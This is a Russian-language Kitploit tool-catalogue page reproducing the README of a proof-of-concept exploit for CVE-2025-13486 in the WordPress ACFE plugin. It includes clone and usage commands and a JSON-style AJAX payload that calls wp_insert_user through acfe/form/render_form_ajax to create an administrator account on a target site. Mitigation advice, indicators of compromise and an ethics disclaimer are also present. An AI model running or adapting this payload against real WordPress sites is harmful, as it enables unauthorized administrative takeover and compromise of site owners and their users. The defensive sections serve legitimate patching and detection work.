Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Создание администратора | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Создание администратора

Репозиторий
118 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔴 CVE-2025-13486 - Эксплойт плагина Advanced Custom Fields Extended (ACFE) для WordPress

WordPress Python License Status

Логотип WordPress

📋 Обзор

Эксплойт-доказательство концепции для CVE-2025-13486, критической уязвимости в плагине Advanced Custom Fields: Extended (ACFE) для WordPress, которая позволяет удаленное выполнение кода (RCE), приводящее к повышению привилегий.

🎯 Детали уязвимости

АспектДетали
CVE IDCVE-2025-13486
ПлагинAdvanced Custom Fields: Extended (ACFE)
ТипУдаленное выполнение кода → Повышение привилегий
Уровень рискаКритический
Затронутые версииУязвимые версии ACFE (конкретные версии TBD)
Оценка CVSS9.8 КРИТИЧЕСКИЙ
Дата обнаружения2025
Автор0xgh057r3c0n

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ ЗА ЭТИЧЕСКОЕ ИСПОЛЬЗОВАНИЕ

⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен ТОЛЬКО для авторизованного тестирования безопасности и образовательных целей.

✅ Разрешенное использование:

  • Исследования и обучение в области безопасности
  • Тестирование ваших собственных систем
  • Авторизованное тестирование на проникновение с письменного разрешения
  • Академические исследования и преподавание
  • Обучение основам безопасности

❌ Запрещенное использование:

  • Несанкционированное тестирование систем, которые вам не принадлежат
  • Злонамеренные атаки или взлом
  • Любая незаконная деятельность
  • Нарушение законов о компьютерном мошенничестве (CFAA и т.д.)
  • Неэтичное тестирование безопасности

Автор не несет ответственности за любое неправомерное использование этого инструмента. Всегда получайте надлежащее письменное разрешение перед тестированием любой системы.

🔧 Возможности

🔍 Режим проверки

  • Извлечение nonce из страниц WordPress
  • Подтверждение уязвимости с помощью функции print_r
  • Безопасная проверка без эксплуатации
  • Множественное сопоставление шаблонов для обнаружения nonce

⚡ Режим эксплуатации

  • Создание административного пользователя через wp_insert_user
  • Пользовательские или случайно сгенерированные учетные данные
  • Поддержка пользовательских имен пользователей, паролей и электронных писем
  • Анализ ответа для индикаторов успеха

🛠️ Технические возможности

  • Автоматическое определение протокола (HTTP/HTTPS)
  • Цветной вывод в терминал
  • Обход проверки SSL для тестовых сред
  • Подробный отчет об ошибках и отладка
  • Обработка тайм-аута сессии и подключений

📦 Установка

Требования

  • Python 3.6+
  • requests library

Настройка

root@kitploit:~
# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Install dependencies
pip install requests

# Alternative: Install from requirements.txt
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

Зависимости

Create a requirements.txt file:

root@kitploit:~
requests>=2.25.1

🚀 Использование

Базовый синтаксис

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

Примеры

1. Только проверка уязвимости (Безопасное тестирование)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. Эксплуатация со случайными учетными данными

root@kitploit:~
python3 exploit.py --url https://target.com

3. Эксплуатация с пользовательскими учетными данными

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Цель без протокола (Автоопределение)

root@kitploit:~
python3 exploit.py --url target.com --verify

Параметры командной строки

🧪 Как это работает

1. Механизм уязвимости

Эксплойт использует неправильную обработку функций в конечной точке acfe/form/render_form_ajax плагина ACFE, позволяя злоумышленникам вызывать произвольные функции PHP.

2. Технический процесс

root@kitploit:~
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators

3. Эксплойт-полезная нагрузка

root@kitploit:~
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Смягчение

Немедленные действия

  1. Обновите плагин: Немедленно обновите плагин ACFE до последней версии
  2. Удалите плагин: Если обновление недоступно, временно отключите ACFE
  3. Брандмауэр веб-приложений: Разверните правила WAF для блокировки вредоносных запросов
  4. Мониторинг: Отслеживайте подозрительное создание административных пользователей

Укрепление безопасности WordPress

root@kitploit:~
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Обнаружение

Индикаторы компрометации (IOCs)

  • Несанкционированное создание административного пользователя
  • Подозрительные AJAX-запросы к /wp-admin/admin-ajax.php
  • Запросы с параметром action=acfe/form/render_form_ajax
  • Неожиданные вызовы функции wp_insert_user через AJAX

Мониторинг журналов

root@kitploit:~
# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Ссылки

  1. Репозиторий плагинов WordPress: Advanced Custom Fields: Extended
  2. База данных CVE: CVE-2025-13486
  3. Команда безопасности WordPress: Руководство по безопасности плагинов
  4. OWASP Top 10: Атаки с внедрением кода

🤝 Вклад в проект

  1. Сделайте форк репозитория
  2. Создайте ветку для функции (git checkout -b feature/improvement)
  3. Зафиксируйте изменения (git commit -am 'Add new feature')
  4. Отправьте в ветку (git push origin feature/improvement)
  5. Создайте pull request

Рекомендации для участников

  • Следуйте руководству по стилю Python PEP 8
  • Добавляйте комментарии для сложной логики
  • Включайте обработку ошибок
  • Обновляйте документацию

🐛 Сообщение об ошибках

Пожалуйста, сообщайте об ошибках и проблемах через:

  1. GitHub Issues: Create New Issue
  2. Уязвимости безопасности: Ответственное раскрытие информации автору в первую очередь

📊 Структура проекта

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # Main exploit script
├── README.md           # This documentation
├── requirements.txt    # Python dependencies
├── LICENSE            # MIT License file
├── examples/          # Usage examples
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # Test scripts
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 Автор

0xgh057r3c0n - Исследователь безопасности

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 Лицензия

Этот проект лицензируется в соответствии с лицензией MIT - подробности смотрите в файле LICENSE.

Создано с ❤️ для сообщества специалистов по безопасности
⚠️ Используйте ответственно и этично ⚠️

Скачать инструмент
ОпцияОписаниеОбязательноПо умолчанию
-u, --urlURL целевого WordPressДа-
--verifyТолько проверка, без эксплуатацииНетFalse
--userПользовательское имя администратораНетadmin_XXXXX
--passwordПользовательский пароль администратораНетСлучайные 12 символов
--emailПользовательский email администратораНет[email protected]